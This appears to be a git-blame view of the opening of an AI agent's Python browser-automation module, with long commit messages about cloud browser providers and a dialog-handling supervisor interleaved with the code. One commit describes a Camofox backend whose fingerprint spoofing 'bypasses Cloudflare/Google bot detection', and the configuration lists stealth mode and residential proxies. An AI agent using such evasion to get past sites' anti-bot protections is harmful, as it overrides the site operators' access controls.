2026-01-29 06:10:24 +00:00
#!/usr/bin/env python3
"""
Browser Tool Module
2026-03-07 01:14:57 -08:00
This module provides browser automation tools using agent - browser CLI . It
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
supports multiple backends — * * Browser Use * * ( cloud , default for Nous
subscribers ) , * * Browserbase * * ( cloud , direct credentials ) , and * * local
Chromium * * — with identical agent - facing behaviour . The backend is
auto - detected from config and available credentials .
2026-01-29 06:10:24 +00:00
The tool uses agent - browser ' s accessibility tree (ariaSnapshot) for text-based
page representation , making it ideal for LLM agents without vision capabilities .
Features :
2026-03-07 01:14:57 -08:00
- * * Local mode * * ( default ) : zero - cost headless Chromium via agent - browser .
Works on Linux servers without a display . One - time setup :
` ` agent - browser install ` ` ( downloads Chromium ) or
` ` agent - browser install - - with - deps ` ` ( also installs system libraries for
Debian / Ubuntu / Docker ) .
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
- * * Cloud mode * * : Browserbase or Browser Use cloud execution when configured .
2026-01-29 06:10:24 +00:00
- Session isolation per task ID
- Text - based page snapshots using accessibility tree
- Element interaction via ref selectors ( @e1 , @e2 , etc . )
- Task - aware content extraction using LLM summarization
- Automatic cleanup of browser sessions
Environment Variables :
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
- BROWSERBASE_API_KEY : API key for direct Browserbase cloud mode
- BROWSERBASE_PROJECT_ID : Project ID for direct Browserbase cloud mode
- BROWSER_USE_API_KEY : API key for direct Browser Use cloud mode
2026-01-29 06:10:24 +00:00
- BROWSERBASE_PROXIES : Enable / disable residential proxies ( default : " true " )
- BROWSERBASE_ADVANCED_STEALTH : Enable advanced stealth mode with custom Chromium ,
requires Scale Plan ( default : " false " )
- BROWSERBASE_KEEP_ALIVE : Enable keepAlive for session reconnection after disconnects ,
requires paid plan ( default : " true " )
- BROWSERBASE_SESSION_TIMEOUT : Custom session timeout in milliseconds . Set to extend
beyond project default . Common values : 600000 ( 10 min ) , 1800000 ( 30 min ) ( default : none )
Usage :
from tools . browser_tool import browser_navigate , browser_snapshot , browser_click
# Navigate to a page
result = browser_navigate ( " https://example.com " , task_id = " task_123 " )
# Get page snapshot
snapshot = browser_snapshot ( task_id = " task_123 " )
# Click an element
browser_click ( " @e5 " , task_id = " task_123 " )
"""
import atexit
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
import functools
2026-01-29 06:10:24 +00:00
import json
2026-02-21 03:11:11 -08:00
import logging
2026-01-29 06:10:24 +00:00
import os
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
import re
2026-01-29 06:10:24 +00:00
import signal
import subprocess
import shutil
import sys
2026-02-09 04:35:25 +00:00
import tempfile
2026-01-31 21:42:15 -08:00
import threading
import time
2026-01-29 06:10:24 +00:00
import requests
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
from typing import Dict , Any , Optional , List , Tuple
2026-01-29 06:10:24 +00:00
from pathlib import Path
2026-03-11 20:52:19 -07:00
from agent . auxiliary_client import call_llm
2026-04-03 21:50:59 +03:00
from hermes_constants import get_hermes_home
2026-04-26 05:23:55 +03:00
from utils import is_truthy_value
2026-03-17 03:11:21 -07:00
try :
from tools . website_policy import check_website_access
except Exception :
check_website_access = lambda url : None # noqa: E731 — fail-open if policy module unavailable
2026-03-25 15:16:57 -07:00
try :
from tools . url_safety import is_safe_url as _is_safe_url
except Exception :
_is_safe_url = lambda url : False # noqa: E731 — fail-closed: block all if safety module unavailable
2026-03-17 00:16:34 -07:00
from tools . browser_providers . base import CloudBrowserProvider
from tools . browser_providers . browserbase import BrowserbaseProvider
from tools . browser_providers . browser_use import BrowserUseProvider
2026-04-06 14:05:26 -07:00
from tools . browser_providers . firecrawl import FirecrawlProvider
2026-03-26 15:27:27 -07:00
from tools . tool_backend_helpers import normalize_browser_cloud_provider
2026-01-29 06:10:24 +00:00
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
# Camofox local anti-detection browser backend (optional).
# When CAMOFOX_URL is set, all browser operations route through the
# camofox REST API instead of the agent-browser CLI.
try :
from tools . browser_camofox import is_camofox_mode as _is_camofox_mode
except ImportError :
_is_camofox_mode = lambda : False # noqa: E731
2026-02-21 03:11:11 -08:00
logger = logging . getLogger ( __name__ )
2026-03-23 22:45:55 -07:00
# Standard PATH entries for environments with minimal PATH (e.g. systemd services).
2026-04-14 16:47:36 -07:00
# Includes Android/Termux and macOS Homebrew locations needed for agent-browser,
# npx, node, and Android's glibc runner (grun).
_SANE_PATH_DIRS = (
" /data/data/com.termux/files/usr/bin " ,
" /data/data/com.termux/files/usr/sbin " ,
" /opt/homebrew/bin " ,
" /opt/homebrew/sbin " ,
" /usr/local/sbin " ,
" /usr/local/bin " ,
" /usr/sbin " ,
" /usr/bin " ,
" /sbin " ,
" /bin " ,
2026-03-23 22:45:55 -07:00
)
2026-04-14 16:47:36 -07:00
_SANE_PATH = os . pathsep . join ( _SANE_PATH_DIRS )
2026-03-23 22:45:55 -07:00
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
@functools.lru_cache ( maxsize = 1 )
def _discover_homebrew_node_dirs ( ) - > tuple [ str , . . . ] :
2026-03-23 22:45:55 -07:00
""" Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
When Node is installed via ` ` brew install node @ 24 ` ` and NOT linked into
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
/ opt / homebrew / bin , agent - browser isn ' t discoverable on the default PATH.
This function finds those directories so they can be prepended .
2026-03-23 22:45:55 -07:00
"""
dirs : list [ str ] = [ ]
homebrew_opt = " /opt/homebrew/opt "
if not os . path . isdir ( homebrew_opt ) :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
return tuple ( dirs )
